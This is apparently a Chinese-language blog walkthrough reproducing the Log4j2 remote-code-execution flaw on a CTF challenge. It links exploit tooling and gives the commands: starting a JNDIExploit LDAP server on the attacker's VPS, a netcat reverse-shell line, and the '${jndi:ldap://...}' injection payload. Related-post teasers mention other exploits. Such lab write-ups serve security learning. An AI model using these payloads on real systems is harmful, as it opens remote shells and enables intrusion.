Log4j2_RCE漏洞复现

简介: Log4j2_RCE漏洞复现

Log4j2_RCE漏洞复现

漏洞简介

Apache Log4j2是一个基于Java的日志记录工具。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。

漏洞适用版本为2.0 <= Apache log4j2 <= 2.14.1,只需检测Java应用是否引入 log4j-api , log4j-core 两个jar。若存在应用使用,极大可能会受到影响。

复现过程

本文复现地址

https://ctf.bugku.com/challenges/detail/id/340.html

使用工具

https://gitee.com/bjmlw2021/JNDIExploit/tree/master

https://zhiji.lanzoul.com/iwGopxrn27c
密码:8r02

将利用工具上传至自己的公网vps

开启ldap和http服务监听

java -jar JNDIExploit-master.jar -i 自己公网vps的ip
AI 代码解读

另开终端,nc开启监听

base64加密反弹shell命令

nc 公网vps的ip 12345 -e /bin/sh
AI 代码解读

进行jndi注入攻击

${jndi:ldap://x.x.x.x:1389/Basic/Command/Base64/[base64加密后命令]}
AI 代码解读

在关卡页面,输入payload,密码随意。

成功反弹shell

ckcsec
+关注
目录
打赏
0
0
0
0
12
分享
相关文章
Zabbix登录绕过漏洞复现(CVE-2022-23131)
最近在复现zabbix的漏洞(CVE-2022-23131),偶然间拿到了国外某公司zabbix服务器。Zabbix Sia Zabbix是拉脱维亚Zabbix SIA(Zabbix Sia)公司的一套开源的监控系统。该系统支持网络监控、服务器监控、云监控和应用监控等。Zabbix Frontend 存在安全漏洞,该漏洞源于在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。 未经身份验证的恶意攻击者可能会利用此问题来提升权限并获得对 Zabbix 前端的管理员访问权限。
1870 0
Zabbix登录绕过漏洞复现(CVE-2022-23131)
Chrome RCE 漏洞复现
Google Chrome是由Google开发的免费网页浏览器,大量采用Chrome内核的浏览器同样也会受此漏洞影响。攻击者利用此漏洞,可以构造一个恶意的web页面,当用户访问该页面时,会造成远程代码执行。 由于Chrome浏览器会默认开启沙盒,可以拦截利用该漏洞发起的攻击,所以一般用户不会受到影响。
100 10
Chrome RCE 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞 漏洞复现
637 0
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
ThinkPHP5 5.0.23 远程代码执行漏洞 漏洞复现
1022 0
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
178 0
Log4J漏洞本地快速复现
Log4J漏洞本地快速复现
315 0